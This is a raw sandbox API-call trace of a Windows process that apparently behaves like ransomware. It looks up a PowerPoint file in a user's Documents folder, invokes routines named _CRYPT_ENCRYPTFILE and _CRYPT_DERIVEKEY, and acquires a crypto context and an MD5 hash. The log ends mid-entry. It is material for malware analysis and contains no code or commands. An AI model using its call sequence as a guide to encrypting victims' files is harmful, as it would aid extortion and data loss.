[0168.800] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.800] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4aaa3530, ftCreationTime.dwHighDateTime=0x1d5ccc5, ftLastAccessTime.dwLowDateTime=0x6f08b940, ftLastAccessTime.dwHighDateTime=0x1d5ab25, ftLastWriteTime.dwLowDateTime=0x6f08b940, ftLastWriteTime.dwHighDateTime=0x1d5ab25, nFileSizeHigh=0x0, nFileSizeLow=0xfcf2, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="dXJHIETG4kltTzJ3VC.pptx", cAlternateFileName="DXJHIE~1.PPT")) returned 0x90add8 [0168.800] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0168.801] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.801] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4aaa3530, ftCreationTime.dwHighDateTime=0x1d5ccc5, ftLastAccessTime.dwLowDateTime=0x6f08b940, ftLastAccessTime.dwHighDateTime=0x1d5ab25, ftLastWriteTime.dwLowDateTime=0x6f08b940, ftLastWriteTime.dwHighDateTime=0x1d5ab25, nFileSizeHigh=0x0, nFileSizeLow=0xfcf2, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="dXJHIETG4kltTzJ3VC.pptx", cAlternateFileName="DXJHIE~1.PPT")) returned 0x90add8 [0168.801] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0168.801] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.801] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.801] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dXJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XJHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JHIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TG4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0168.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ltTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tTzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TzJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zJ3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J3VC.pptx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0168.804] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.804] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0168.804] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0168.804] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0168.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.804] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0168.804] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0168.804] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0168.804] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0168.804] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0168.804] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.804] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4aaa3530, ftCreationTime.dwHighDateTime=0x1d5ccc5, ftLastAccessTime.dwLowDateTime=0x6f08b940, ftLastAccessTime.dwHighDateTime=0x1d5ab25, ftLastWriteTime.dwLowDateTime=0x6f08b940, ftLastWriteTime.dwHighDateTime=0x1d5ab25, nFileSizeHigh=0x0, nFileSizeLow=0xfcf2, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="dXJHIETG4kltTzJ3VC.pptx", cAlternateFileName="DXJHIE~1.PPT")) returned 0x90ae18 [0168.804] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0168.805] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.805] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0168.805] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.805] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.805] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0168.805] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.805] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0168.805] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.805] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.805] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0168.805] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0168.805] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0168.805] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.805] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.805] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.805] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0168.805] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.806] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0168.807] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.807] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.807] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0168.807] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0168.807] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0168.807] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.807] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.807] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.807] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0168.807] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0168.807] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0168.807] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.807] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.807] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.807] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.807] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0168.807] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.807] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.808] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0168.808] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.808] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.808] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0168.808] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.808] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.808] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0168.808] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0168.808] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0168.808] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.808] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.808] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.808] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.808] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0168.808] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0168.808] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0168.808] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.808] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0168.808] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.808] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.809] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.809] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.809] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0168.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0168.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0168.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0168.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0168.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0168.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0168.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0168.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0168.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0168.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0168.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0168.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 